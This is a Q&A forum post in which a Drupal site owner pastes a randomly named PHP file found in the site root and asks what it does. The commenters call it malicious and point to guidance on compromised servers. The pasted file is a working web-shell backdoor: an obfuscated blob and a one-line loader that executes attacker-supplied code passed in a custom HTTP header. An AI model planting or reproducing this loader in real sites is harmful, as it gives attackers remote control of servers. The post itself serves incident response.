# Found random php on a site, is it malicious

Tags: php, drupal

While making updates to a site, I found a php in the root of the site that had a random string for a name, wybjdmuthp7dk6zj.php. When I look at the contents it looks like:

`T89SGEHDLP9B0AGY<?php #+CQ9jnUNtMKWlo3WspzIjo3W0nJ5aXP0kXGgcozysp2I0XPqxnKAjoTS5K2Ilpz9lplpfWmRaXGgcozysp2I0XPqfo2qsMKWlo3WmWljaZPpcB29vK2IhMS9woTIuovtcB2M1ozA0nJ9hVT8bWSpfWRtcrlELCFpaBlE4CGN7WUb9p3EloTIhXPEKXGg3nTyfMFtxrQjxrvy7Mz9lXPElCGN7WUV8p3EloTIhXPEVXGfxpvfeXKfxJP49L2ulXT9lMPtxI1fxrS0cKz9lMPtxFSfxpy0cXGgcMvteXlE4Cw0xrvy7LaWyLJf7sK19pzI0qKWhWSt7sFEbCJI4pTkiMTHbVykhVvkznJkyK2qyqS9wo250MJ50plu0pzygXUOlMJqspzIjoTSwMFtaY1jbKTDeKPxtBvOyqzSfYvbiWljaWlksK0MWGRIsKlxcXFx7MKMuoPuaraIhL29gpUWyp3ZbolujLJAeXPqVXvpfp3Ivp3ElXPEbJmWqYQRcXFkcp3AyqPtxK1ASHyMSHyfaFSEHHS9VDxyMJINkFvqqXG8xK1ASHyMSHyfaFSEHHS9VDxyMJINkFvqqBwNcXFx7MKucqQf/Ct isset($_SERVER['HTTP_CCBNKEN6'])?ob_start()&&require pack('H*',$_SERVER['HTTP_CCBNKEN6']):''; #4895e7264d1e92c2f9a46cf22a2c044236434cf4ababdff876feee9cfc8f08833406fe5f1b08f8d693a3a815324305c8aa9a1fa19a973152446179571a8c2bb781e91cadeff7ef8c662d714c231e9b4b7fa3fd33dead8addcf731f089ca964e75b2d740da35aa483d53f08c1aa76eda8c13d48838d9edbbe48d3163a2b4bc203bf4cbe938af31b37760e4ab5856596b4c3afcc0516884ce77206c08ab7a569aa5c5fb01ec462623f331572c0e980efab14dbc9ada64e15f905d04ddc9b8f5e68ccf4370be917f4c0b18cbaa08dff1e9796011522e1d96e883482e0bb239bec689f9e38c51837a6d5e4f7e82d7fa8a78f37266545a44a1046db2cea362a893d445de40c4e982cb2813ea1b5d04f3e3d7c0159cfc791b4a5fd8301ff2e1a8801c505b219d1ef7f2fd9d2f0f8ca82c1e44e9dacc2964414bdbe49c57a8761740a037a0954702953acd98251792a392b20b9ba29379921b25fd4553984204dda95e7a6a6729c088a3631e6f7d52b5d2ebd22db38e05c8b9fdf39b4cf1b3f6a67341ba67111e4ec5eb6861afaed97c684ca02b5b0a34057edeb302912164ed193f26b76770f43d06b0e55528f95e87dc9635786c89fb530a9b0338b8ea4a808c9ddcbdeb6b4ad846c98624225a1595f0fc50e171dbf90be452996f8a4ff77278039729bfd278c1ab31374a60109d40d30e05fb1cf2693fa343918497f233f26b98580c360408a694bf8e8ab183273b58ecd9532df552483de44b23869cb734e72a0c10bd2d9d9fc28dd947c4a64e7ac6dc58b6c074d48823235191219f92e1135eef40f7eec2f75d1663a0f7450ebf164429e1fdd640264fcd02ea900ea2178d8c45b4f45307be7501b6ac680e325e313014dc2e8f64ac5e8916018982a7551779486269ef2f47eff02b1c2e670270e766bccda6e97d3d5e280f1ad49c27bc1083b23697b719c961e8f0791596af9123ab2025613ab1eda29d9477b6c8b559b7b408671559b5af2820f078240456f0797f1a5a91a959d999b057b4742d8111c73cdeebc640f4e069152e122afa400840142958531bdf53e2cdee65cdce98d8503aa7e765991f42d24ce200235059125c2c16795a5b6b0bf862ef1a04d152e60abe146ffd11a882ed0df1d70fe16597784ba1fa672f299d17bd7aeff332903d203b0e115cd1c83e0bfdeebbf65600e78ace1e95b69b9fb10d7fc6a39f1912b93952cda49eb256bdd5306ae6ad1664b45b2aab4159345283c6a2906cd5ab0092a81a7768b34294a4e90b05674edbd39dea601df55defceebca3fe672cf002e6ee2caf4ddce67e9060723c0782404dffd698b34b1303f3345a0025d62980ed2c827c7effc569199e66a31d68ce4d1dfa076dd44e2f5b8005209782bdbc83a4d87079beb9ec7edc574cfcfb2ba028a2a8687952140e2c9186e87c7119e4e0a8565ed5c566cb16658bc4c174c2ab8302437a16c12957f3b398bfb0621e402a1f12e1529a044307f15af0b44822e424f02c7e73f5b684d822e6e95d01ed0dbc80b735b4614371a70c1a53840ef179894f0c3f1aacfb3a9a2f891323ab7e081bddbac60ff42dad23d9bab8b6e9f583024474bac5d99b7e0013ae58515ed4d29afb366305cc585b851c058ff5c8f08be8bf9832ed9103d60bea62d70f2045ee2eea6c34a1eb75f265926136065e6d644e402ccb4da1d329053d688346c4038c7cb31bf991686b7a5c9218c724b831d1797a9e92983fd4fb2b3ee1a04ca8c120a1b6fc827d1928251eae5c8050c89d16459ae69254d41853e4a89015deafb8efbabbe6e2dc53d0c4fbb999fedaf6013e8e7e4d3c007f3540b40d77ef560937410081f1179d1d22562f6a09e57a9a91c6420381372557b98b89470a0f8dea48263c0d52a50fb7209cf74c2df2fcbd1da88e99573760a2f0ecab6eb4344b77d6ed65df5f0316007f8258bbb3604077f958a6b18f2f2affb68612238ebfbd34bd22d88d32771df294538476c94092bfde4304b517f752097faaf12dc7f64d00d2b907178c9c97d9191faa73e020e9390ea788d06782a49cb47b717dfac12aa2612739e0347a963f3ff255444e7ecff260b9212574991dbbef0d17b6ab79296f531646774a6f241bf62e611bd181d5bf5ba7fb3c1c7a268b481581313d1fcf7d714b1b8ede823c622d689f0d7a882691199296def45438c7971d0c65fcff1fbd59d6035c2ed444c4417f602508b67065c77cb560657091e4318f5d38c2f6a42d2bc36659de497ea8af3b81be5af67d4865e1c9fc0a097905d252db31f664b35b2e13dfa90c625cc64709d3619ba2d139c7f2e752e552de2f791df2fae5f9beee4dfb2c971e47825fa824065463c6a768186260b893ecd9720a402cf860338a0aa2e4ccb17492037fe002b0819331cac0a76c05d93348985e1ca7cac94e0bdf4d89fd1fea35b1bccad967e48b6afa409f4e30ce56962c36d4754bc1cce835de993fbea5e28d6939bac256fe423997e6a41bd5e5d3a2afe90c3cb40fc4f5454ca523b5d7cfef718d88ef0df0761615712c64166849136e2b8bf430c1340d9a31e7cd552e1132a3fe4153097a0f74067087354687cf4115e0d660ca75d30c18c83c7caa7b3b41019ca429afa4e8a3a1385ee60f1000e887be1b48c3d6944860baa6a575de429ade65997e0a98a92be5613219e85b2a7898c0dc34044a827a87190fa3d3feb9b2821441bb46fb81fe14319a64cb373326c24f60330d7863c1caeda18eeff6d43559fdc31e434b49fcab1b0caa927845c64d7c2be8feffb14fcf38261e95d9289fb09ec0179add435d9a6e3275b8ab9fc9182172f644cffcb387f8e19e61c034cf5b36087deca8b882f3965815675317f6dab11e40ab0f832c055f25c128b754c405a768d0e7e8ed7c05b00dee4f3415037d27200cc17a6c1e8b29a1a57250f6d93e28cfe674fcc49bd53bc7e9162368378607fbefdb910e468d4850d3c3b6dd62486db735870e7cd763b166f80defd2e1f5d05089745f4a65a78143849e64900bc7f224cf60c5e53c00259cc8b97f7c13ae8a027eaba086f2f1f1ffba04050f65ec8cb4cd174f7d13293de2c76850ee667068005a53656ef78f0ba9a14f6d1ab6aedfcf1cb36c3b9a6e27c36af881a9e6b2fcc0987f60fb1e7726a44af14883d29e8a27ea210ded060e1dffcd41719c2a520aa0a0708713c2117a4078f6ca818cb8caf2b52928ec4d980ac116a5025987de32ff02079feca6c508cc233b533ffd41557b9675dbf49fda6b80a79520df63d8cee591d2ddc35ba4cfeb31eaa97a1e7decf67ebef442ae8ddd006b4bdc40da6566f1bdc91df14b0dddb6d3841a9bbeb5eda5a0c920c4f7234d118e4d73a28e923e83f745d8ceb68ca3221264617909ad729bca843400ceb134fe77c9200701a957e8d02b12c4c009e8cca357d91302adbe63f539494662b2401bf81901d537f274a23009e78e629becced0a7201ebee216b8054904b31a68bb5243d1b7374b3b37fdb7ad1d002faf1c90ea3256412e680cb3577c3808e76ba4174665273e64981d325f07f22a9110d009776a5317b21ed0e0aaa53f2c3c47644179c298d88b5d8babb7e6ab5114dbde476b420fe0bd64f97e991dc6065e49feb26d1005cfbb468ae815dffa2e03d04c9d5f61e00938c2de36ce4c86c948d164226b09d7a9f27adc482b9d98525d36faa420eba7ed34abef01267af2d40ad382204f49597b3c47e4cd2500e84acfbbabe58288724b8610c0f7c22c802c1d51d075924cb3dc713064aecce1cfcaa692eee26cc6d432297674681455d91c69e65adbfd49fb467353235c372cc9f77372d45e56174c97d907e5ab88792897a2082824ba63dd006bfd4e12052506d07733fa91a818db8944a9b03fb3358adb4d535e0819065df3c3d138cf84388ed2655ef73922453267282d73b1b77fe7069e456025b52d8bf465dd3767af46a72d0e9da5db50f93353e3dca1712eceef97a777544c2a539394ee0e236557ae05bdd82b345c25a694f4ecefd4b658fe7c26689ea9d77cd9faade178f21288db59972f442f0649c171e6813df47f61769ddf6129cbacccfc0a53684af06de3a3396c7ea0dc3a7bb7491a3cd834cb7b7a809f3bd94ad09b93e4c0e3a06fb3a4f2a1833c913f8421150ea79fc9b8304a27da8a82b13aa2ed4460c4f7d1439a8e8eb5609f7721a38fe4028e1fc6e43f66959c34275deae8bc181637951403a7faec6c74e0c9e2d4e2213d2648f1d610576752f99d236b02064b31c43115982820cbb0e17e5b7eda403c605189fa8e03eaca242e847cb4d7434efbcda9a773805135464032091a91a56166ee6542422e46c01f4ebfa94f18adbad44709744aa8a83a1202c469605bbe3f50b9434a5041176ebaf7c477f63ff9769472ff933a2d21531a0494f296241b9f34b942fbc47d768a6370577ba34fcd8a05ed7adb1566cd7738fad35dc14812df0f43e631d2bdaea3abe21673dd97a4011bae3c17c54008ed89072f8b626e3382f3cbfc40adff4f26db097428db4e15d47e3f83cab222d06d3136422fd55d21a10a8beacbd0bf1b07f0cf5359d5ad6ad59e378aa4644d3628c6839c85637e56329e96cf74300dabcbad7e3874d7f17c0e80bad1493d29e887c29fabbf6939dc40da2837eb6d7cfd0e3c497253c244c7cbe5f7ed889364f3e41e3f525d1c5998faa82e449786de806ce66d0b98c32de79cb05ec35ec07c87ee7d51d7b89e50fdd1a1e725680da3ed02885ef600e773b685c9ce954e473b8971a84d35af1d290d64c0853d2e638a0021c47e4dc18b9c42eabf3072f977b417f95de3a437290be30fb7f601af263ceb710e7a15aa5b3e2b61cf0c1ac5a148b155069a070a346d005ade0820988b5293dd07b4c30fb1345290711003a887bd380e56abc82024cb31bb635be879267c4fbcfc0b4a5dad6a51d6b2235d0efe2c6b111b7c5cce8af6e63c43b109d36af7848dafeefaef5a17c26249ad69b04324a0ba1d1d2ae5348e10012d408d3c80c148a4f2e4415132d75ca5ca4687083d8fa90315ec23f90f089699c469c1d1119b8fbaa72b6e8ed8efc2175ea9aef1f80944755c648f9bfd3651327aefc2cbfba7fd0b1e6ba035d8beb962168e27bc3a43aac31d4e867b7efef863d8323e7b3930bb871decedddced10c7660bbf3c3b9144a5022c5da125e2a6d61682d93f98b219293cf77841e216e64aef90834d6e0999de4d534518557c9f6fcf05f0e68db54352e4dbcd9256a9bbb600759da14d4b0786d9dafe7d9d5332fddb86037f1da341ebe778b9125e37a217665c0187331a5749c364ee96b4c9de72ad90e6b3b0a26c4b760b6ec4fd651a0290cd3818a9b1071e1fbf7b754460de6b82314748ed7f8844d03ba7c02593ec3342bc34374cb13b715a3b8ff4ccd1effcd59a9589c15bb8c5724df22d2e818bcb0ab525095d572a1b92de64d036f73c46ce3b9fc15a889d8ab7763175fa941d84616774fd050ee3c83fd52d9aef73e95caad50e912b93191b467fe784abec5da98bd88ac8088d3fb380e58dfdcc49201843a43433ae6a19e82bb6b70f2f7c007c4320f5d6f66fcb7be90819757ec2fdfdc6376c9477ee25756df381f072e8a309b2c828f486e3aa6ef459a72944c3c63eff491af23eead927e7cef71fb768752e6f7fa63c8c6f0c5e98db25251ab984b7b304bf5e3342ba39c4c547e28c469fd98d609a900065daf9fdeaf9dcdeabededed14aa128aa2b5da524336e60752b7c0d01e3999bcd82a2ff87493025dd57620103bfbe261dd872445622f1c604516ecd70cb660e8b968b972640e92e00f6afc09a8aee931e8cfc5ff6bcbad1f247ff5b0e8986705d2587989ec835513cd2559703ddcd057fa140159959b375893b90e1daff18b0aa550f241782982ec074e34b382361d4d157b9bc644125f1fdb9fa5564df98d7d55bc3816befc733de86eab99902cefb4e809d5fe4dc204282d30827f6ac61defe169875be81d17fdb314ee079d40171cf33015287426efe3323027df705661ce52b1cebb9a2506b91c6bdd4c2d03fa676bbdad095b7cb1b6f426ebee010cd55a78885a5343d50e9be4185ec45fac0ecca1f420ea07f6c0536b639d424cb015f1ca7bff1afe43301f3e51d99eea6e2aa8ddac0d7b48c23b79922a1397cb1afc399b98991bd8829afaa9c3300148ab4b4478f4ce976d2e6b65d9eac45b5ba8cf7b2953dc79fdade4f698ca4febeccadac6b4d6a09aabc2f93841587b5273387cf21322894136c9c9999a738127c280285649b9ea8d40bca32c50a97804d9bc22f86f01393f31d526830ac5682985bb1d7401e9a9a48ac49f04e6d056b0a50c89c9d172b146b984fcad6d584df0ffbdc76bc5f4ca183e4bfb1e6258c821d232df395718667a17925678a29ea44c68d813c48e37fe52fee15c4543db6423b90ea949479d820909f87b56d45f6b21d2407186a4e898d933808160508aeae5a19fe995854a8c3e00475cfa7d2a86f0f4c4121e673be1fb8d0c84dc5756b4203526b273d7df9e716e1510c8e60793e940e91a9efb3104abacc2c543e8151cb221fbbae4fcffa5b780d3c64bfd814e77b0e7b1733c620a5cdc4d48d2267770d9c555c791aa92acc2074a8d87f7d6d2931b57b6194fc8f2edd9a4f97b0ddf02afb479c8568611700222f8a91061f7b6dc545d19164beced0095ec08bf2dfe2962f021b3e494bc6df83e5f25bb25b7c4c7e98acd6c995daf2919bc312dc52b45240581b4c0c22bae164baed4c17051cbd870445c859f45d604049202292b523f5771eaeca3a99ccb9ae89ab9ca5fff50fdae467caf07e488d129b257dc4485dd132f0e56a3641528ebe922977fe5cee499d2bf2d36aac89954cb0e45c3f3d3797a3629c4c0fb60c08bd9c6d8b629a93d54eada9430aa50d74cce8477d99580125eafd6211b5ce26d6a845146ee956281e33a508912ba5c1b82e8d733b8e57660ed40e468b928dd3729c834b389d7feb471d9261b2a6248b57b3cef195188ec83ff3a5fe446649abcb807752483b14b5a757f14a6c184a41fd3843c684e2f1ff4d3f67409639e4c92f215b650c88d6550b0326e5191d8331412fd50081f5bcc0a7921cf20dffdb1000544cda8a468fd6167b2c9e399760c12235b240d24ca799d8a6c897647bbcddc450c6e3826f88020ab48f8749d4db7624c70d8e45e8bc2e40222e58829e8dc9d1289e7aef6da22f6b2fcb9df77e19d55726457f666904c828ba7424f2a58eb102bd2576e195b7d770c9c36c5eb7bf57db1747269a2d1951e68dea4ae369c49d25fba534f02f11105a2eedba4d8d4fccccd6b7d801ce5df32def845c9336aac3da4fa4d7061a02fc740999d90a544191b924c75024f6a576546f61dc85ace8e0ec717aac9a630c23239f918286018dedbb3d947b5255a19614c5f2b59bf95be56c120bbe8d44148c3fd5a41296fcc8c11fa364b8126528cbb89cb5fbd0463c84d2bb5876e389b297b56939f54b71fe2158e7f88d43990a69d1ce7a790ec5abd419bcad8a901f10b13b431b31798333d8dfbec12763b8f4fda139b4f5c63b3f6f7af5c554efbb37f07c835a425719145b20976f9fe6cc857911c18d43f77dbcff45a0e35cc6a5a41f3777967647c129d2d1496dc14967f4b29e4c1446dc49b4d8a75e6487d44ca92b68067b2672d595083fc16424138cf50992e3ffa875b5728d5625fc44384af65c108097e47b72a127ca6d6c81a21fd94517751f970a80556d1faa6560e7fcf1b0906be8915626cc4bc9ba7fa41a1434efe0cf1fcf20e8d9ebd1921135c42fdcf49a0d967f36c5d781201a25719ac9897cea1f0936ad5d1804e8a6ccab80a3ccf82666a373d920f41bb9f9fa40d5a68a48454a38e54b9655670288a7bcb3d09fba19313ba5cb9339c554af0a7d9c59a3fa5b0c6530d49ee8fba0f121a2ca17d343755e8f51851adc0e7ba256b86ceb7db75cad48873d43c8a10893d3b78ccf2dc4e2cb08f2a53b73bb933fff4a583efe629fe4f047633b1574fe9d09e99047703a2add9aa1c9a45539d7fc7615642d16d49a734502c2e087767b60e036bd7fcf165b75e93e295f81669f1851c8fe1d48ff6b329d145df473269dbd637cba113d585e2178c7bbc8252a2f6770a4c6a549537582d54b536513c950d2cbe62eb176df46c23febcd4792ab37c8d51828621a787c0426cf9bfbb5d7a2c4b5d8b9eaa74b3181991770246ec9b3b02bba6a6d3fe924c035c4f1cca7dd25379b6ccbd5e60b047bf03c5bef8ca3c54f1507e6da3b84ae51e059b043ce7b45ea10600cea6311f879e390d2b38f09e07028800ad157e29a39c212a0accdcd2157a52333783d1ec14a02298a22f4526613aaf07c9df2c4e6269872080f98a6e39a2c96d9c94401d2e335a5f7de45adfa3a80760081d7f31a469ddda0779ac8ed3619cbf76901660188aa82fed8d77d8c6ae7747bfa448695e5442b64ed756a29f61d27877133f36645fb0514253090dc3e4b73bc775e90aa9f157a18a347fbff083562af998e745ea31a43c5dcb1d76d7cb3fd6b9ef0d41485b76b2903c2e21001f6b3cc0e2e603b676efecc1db9baf6a75ec1a5e674b18e695cb3073184dac030519ff9666c40706ebe408e6af8aef1fc321bf48b0528c324727f3196b530df7fb46cfb67f0b52ba003a5a6fad4413bd006a25fedf905186327b752e1d5df8b29b74ef0afc317926d446c1d15bd3bdf4a0ffae04132e121f618a1644dfe30811fc70e646ad24e2b95464893d4df81b6891aad7b1995cc4d229422b77c77201aad5d3987815fadddaa4a2bf598b7ca92f98e61c3a7c0dbbb15546500621a1e1baa3550c5ac47aa4806657d4e0d48fe08785df5474488aba6bf6c755268a816c5d520b6718e45cb06ea50628c936207869d4497b2725dfe186d868eb24566a246533688373f0a97a0ea51944ee7a3c1c6ce61ab5bb60cd44d167ac0d841728bf07cb276d28c70901aaed816f352b30630dce34554da2d5718bd35e79a5aa97e3fef63d5dc8dc239cca0abb4f82c1ae4773aae370bed5cc6faebdb0c875608be5c8f8632ff5d2f59678d424966909cc7426a559a9d5ae7b77fd8975228703f03bb96c776cfc1db807273d4f25fcda0d1389f5985ad347b19f13a84754195abf51d1de7412e6983ec76aad42265d60858b59991ba865bc2c5130c10433bf1f506c3e98c82b3d6163e168e95a2063cbc80a0bd8dc2b3157d8827f1be322537b497836e65e39b65501e5d5b350918a14aad095e7f6f9e968e0a82d5c2314a6f108ae79b9675b46b6d27fb5796473a93b1e9e8393b7f0b6b184b6e47b7016e339529c3743a8cdd8e0154bf853b0c1386cbe43dc68186ac7309b31d53045a7de5bcd67d5a5f403ab67c40514d6ce66352c694b17ee539bb6759945bd05ec51264fa68953cfe3a6987f8d0570a6df3d5f5dcab0efbf22e7419936475ab74ef57955e485cb0a451d4be35f6946b6385f94804df2c516603fe960e16a48482944a78fac14316e99fe7736bf4f368ba31985b0eb047f5e7938a2f1df87cc1c8b43b78918ebd3b8f358b385cfef97367955a0c45653b8e35d08ac85a81c2484136b6979f26f262815140da57e0e1c8b900dd0b69f12479d46e4a558d25c7bfe91fb209b6caa2094e1c4560369ca7082d698a39d2c787db4f7acaac5fd5a83b038c846f2e410c09843394ad054aa488fc191f79be2f46e395bfbfec7c63676b84c35cb6dd1f549209121d8e16af7e616f4ed31e6bef2456560392b314e21dcde68cdf68b3d46feefd14d418196af6d4d15a88b4062e842033066d5af5b8d54bb486b85bb08fd714c38a8b13ba5192f184464222a3ede22a6d1f6d11c4a3d93f0d7078a306e23590cf005e822562182198509a6766c34cf6737a8953a4e337467763c502f5f3ec0034160baa8bd1b6343ee19636ad545ecfe96a1c840dc8214973106e3b2e5a002a8196e770f764367005a182e401bdec23a421ea08c9d3dc2c5e40f7b4f6285364588f8f9e08ffebcf068a2184d0949734cbe9f738382e97744a0d3ea980e902efec4b91c368c75ff107563c3134ac1c9722d8493a79a53a1aeda29970ba38856344cd1696615c0b72c4ca3b4ff94adc35fc1dc4d2a7f6cadec5506e4442dd100f98f6f6b3114ac4411cbfd09cd9ba2c70b95bb50f67811aaea8155435621b35ac8feef66fb4848c5ca35986d44fa28b6737c1f6382beb31955bf5ad7dbf7314bab6b423b886c3f194f5ee895d029def544dadb590868f84a79a20d984bbcbddb9600b88655b14b1dca68cbc4dcd6cd5f9bbde3fd9ad53b18747edb4f2901ea043485dcbecb94877d5e2aef69ed5bbaf`

Any ideas of what this is, what it might do?

Removed php files. Just trying to make sure I don't have a bigger issue.

Comment: It's hard to know what it might do, but it's somewhat beside the point. Anything that got onto your server without your knowledge is a potential threat. Your concern should be how it got there, rather than its precise nature. Because even if, for some reason, this isn't dangerous (which isn't that likely, unless someone put it there just for a joke, but why would they?), the next thing that gets injected by the same route could be.

Comment: yeah it is malicious, remote requiring of php code with a obscure header (CCBNKEN6)

Comment: Take a look at [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) for some comprehensive advice on next steps. Obviously, some of it may not be applicable unless the site belongs to a corporation or something, but a lot of it is widely applicable in terms of how to remove the threat and get back to a stable position.